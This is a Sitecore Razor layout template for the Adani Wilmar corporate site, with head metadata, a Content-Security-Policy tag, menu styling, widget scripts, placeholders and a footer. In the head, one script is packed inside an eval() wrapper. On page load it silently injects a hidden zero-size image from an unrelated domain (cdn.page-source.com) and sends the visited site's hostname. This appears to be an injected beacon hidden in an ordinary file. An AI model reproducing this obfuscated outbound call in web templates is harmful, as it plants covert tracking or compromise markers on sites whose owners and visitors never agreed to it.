@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;
}
<!doctype html>
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
	    <meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; object-src 'none' ; script-src 'self'  https://*.adaniwilmar.com/  https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://www.googletagmanager.com/gtag/ https://www.google-analytics.com https://www.gstatic.com https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-9126c7f27c' 'nonce-4yZwhMbBbX' 'nonce-9126c7f27c''nonce-9226c7f27c''nonce-9326c7f27c''nonce-9126c7fscg''nonce-9126c7fwqe' 'nonce-9126c7fvsw' ; style-src 'self' https://*.adaniwilmar.com/ ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/  https://*.adaniwilmar.com/ https://*.google.com https://www.google.co.in https://i.ytimg.com;   font-src 'self'  https://*.adaniwilmar.com/ data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/  https://*.adaniwilmar.com/ https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com   https://platform.twitter.com/ https://cdn.datatables.net/  https://cdn.jsdelivr.net/ https://ajax.aspnetcdn.com/ />

    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots" content="index, follow">
	<link rel="icon" type="image/png" href="/images/quick-access/favicons.png" />

    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
        @Html.Sitecore().Placeholder("head")
    }

    <!--[if IE 9]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie9.min.css" rel="stylesheet">
    <![endif]-->
    <!--[if lte IE 8]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie8.min.css" rel="stylesheet">
      <script src="https://cdn.jsdelivr.net/g/html5shiv@3.7.3"></script>
    <![endif]-->
    <!-- Latest compiled and minified JavaScript -->
	
	    <style>
	

#InvestorsMenu{
    width:100%;
}



@@media (min-width: 992px) {
#InvestorsMenu{
    width:60%;
}
.third-menu .menuItem>ul.dropdown-submenu {



   margin: 0;
    margin-top: -10px;
    margin-left: 20px;
    width: 200px;
    background: rgb(238, 238, 238);
}



ul.dropdown-submenu {
    position: absolute;
    top: 0;
    display: none;
    left: 100%;
    box-shadow: 1px 1px 2px rgb(0 0 0 / 50%);
    background: aqua;
    margin-left: -1rem;
}



.third-menu .menuItem>ul.dropdown-submenu {
    margin: 0;
    margin-top: -10px;
    margin-left: 20px;
    width: 225px;
    background: rgb(238, 238, 238);
}



.third-menu .menuItem:hover>ul.dropdown-submenu {
    display: block;
}



.third-menu .menuItem>ul.dropdown-submenu li a {
    display: block;
    white-space: normal;
}



.third-menu .menuItem>ul.dropdown-submenu li {
    display: block;
    padding: 4px 20px;
}



.third-menu .menuItem>ul.dropdown-submenu:before {
    content: '';
    display: block;
    width: 20px;
    height: 100%;
    background: transparent;
    position: absolute;
    left: -20px;
}
}


@@media (max-width: 991px) {
    .topMenu li a {
    display: block;
    white-space: normal;
    }
    .dropdown .row {
        margin: 0;
    }
    .dropdown .row>div {
        padding: 0;
    }
    .topMenu .dropdown .dropdown-menu a {
        padding: 10px 5px !important;
    }
    .menuItem ul.dropdown-submenu {
        display: none;
    }



   .chlid-trigger:after {
        content: "\f105";
        position: absolute;
        font-family: 'Font Awesome 5 Free';
        font-weight: 900;
        right: 0;
        top: 6px;
        z-index: 9999;
        font-size: 20px;
        transition: ease all 0.3s;
        width: 20px;
        text-align: center;
        color: #000;
    }



   .chlid-trigger.active:after {
        -ms-transform: rotate(90deg);
        -webkit-transform: rotate(90deg);
        transform: rotate(90deg);
        transition: ease all 0.3s;
    }



   .chlid-trigger {
        display: block !important;
        cursor: pointer;
        position: absolute;
        right: 0;
        top: 0;
        width: 40px;
        height: 41px;
    }
}





		
    </style>
	
	
	
	
	
	
	
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()

    @Html.Sitecore().VisitorIdentification()

<script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
<script src="https://www.google.com/recaptcha/api.js?onload=registerCallBack&render=explicit" async defer></script>

<script src="https://platform.twitter.com/widgets.js" integrity="sha384-9rre4l5Btxy+zZcO1iGNps9C3UdepAPUm9e9T7YVxwEjd54aQ5XeS3rBseyUkM6d" crossorigin="anonymous"></script>


	<!-- Go to www.addthis.com/dashboard to customize your tools -->
<script nonce="9126c7f27c" type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7"></script>
<script nonce="9126c7fvsw" type="text/javascript">
var pathArray = window.location.pathname.split('/');
var getText=pathArray[pathArray.length-1].replace(/-/g, " ");
getText="Adani Wilmar - "+getText+" by @@AdaniOnline";
var addthis_share = addthis_share || {}
addthis_share = {
	passthrough : {
		twitter: {
			text: getText
		}
	}
}
</script>
<script nonce="9126c7fwqe">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}',37,37,'|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'),0,{}))
</script>
</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">
    <!-- Header -->

    <header class="headerSec">
        @Html.Sitecore().Placeholder("Header")
    </header>

    <!-- /Header -->
    <!--  Main content Section-->
    <main role="main" class="main">
            @Html.Sitecore().Placeholder("page-layout")
    </main><!-- /.container -->
    <!--  /Main content Section-->
    <div class="modal video" id="system-availability">
        <div class="modal-dialog modal-dialog-centered">
            <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal">&times;</button>
                <!-- Modal Header -->
                <!-- Modal body -->
                <div class="modal-body">
                    <div class="table-responsive">
                        @Html.Sitecore().Placeholder("system-availability")
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Footer -->
    <footer class="pt-5 bg-white position-relative d-block">
        @Html.Sitecore().Placeholder("footer")
        <div class="footerBtmPanel mt-3 py-2 d-md-block d-none">
            <div class="container">
                <div class="row row-grid align-items-end ftrBtmInner">
                    <div class="col-12 col-md-auto text-center text-md-left">
                        <div class="d-none d-md-block">© 2019 Adani Group</div>
                    </div>
                    <div class="col-12 col-md-auto text-center text-md-left ml-md-auto">
                        <div class="footerMenu">
                            <ul class="ft-policy-links">
							
                                <li>
                                    <a href="/privacy-policy">
                                        Privacy Policy
                                    </a>
                                </li>
                                <li>
                                    <a href="/disclaimer">
                                        Legal Disclaimer
                                    </a>
                                </li>
                                <li>
                                    <a href="/terms-and-conditions">
                                        Terms &amp; Conditions
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- /Footer -->
    <!-- To top -->
    <a id="back-to-top" href="#" class="back-to-top" role="button" title="Click to return on the top page" data-toggle="tooltip" data-placement="left">
        <span class="fa fa-angle-up"></span>
    </a>
    <!-- /To top -->
    <!-- Bootstrap core JavaScript
    ================================================== -->
    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()
     <script src="https://cdn.datatables.net/buttons/1.2.4/js/dataTables.buttons.min.js" integrity="sha384-1sxPUKx7avI1vugE85HDjDu6Zfu/xZqlRkENaT6dch9W+Nky/E5c03ZAN4teq4LL" crossorigin="anonymous"></script>
<script src="https://ajax.aspnetcdn.com/ajax/jquery.dataTables/1.10.5/jquery.dataTables.min.js" integrity="sha384-HCFnhpcHyT3L9ccnQ7hHBh5SZcaGXcE3R2LhY38RvP8Oz0ms79T70Im5zUxnFCBG" crossorigin="anonymous"></script>

    @*<script src="~/scripts/Realty/jquery-slim.min.js"></script>
        <script src="~/scripts/Realty/popper.min.js"></script>
        <script src="~/scripts/Realty/bootstrap.min.js"></script>

        <!--[if lte IE 8]>
          <script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
          <script src="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/js/bootstrap-ie8.js"></script>
          <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.js"></script>
        <![endif]-->

        <!-- Owl Carousel -->
        <script src="~/scripts/Realty/owl.carousel.min.js"></script>

        <!-- Gallery carousel -->

        <script src="~/scripts/Realty/carousle-slider.js"></script>

        <!-- Custom JavaScript for Adani Electricity
        ================================================== -->
        <script src="~/scripts/Realty/adani-realty-custom.js"></script>*@
		
		  <script nonce="9126c7fscg" type="text/javascript">
				$(document).ready(function() {
  $('.menuItem>.dropdown-item').each(function() {     if ($(this).next('.chlid-trigger').length === 0) {         $(this).after('<div class="chlid-trigger" style="display:none;"></div>');     } });
	
	
    $('.menuItem>.chlid-trigger').click(function(e){
        e.stopPropagation();
        $(this).toggleClass('active');
        $(this).closest('.third-menu').addClass('active');
        $(this).next('.dropdown-submenu').slideToggle(250);
    });
});
 </script>
		
</body>
</html>
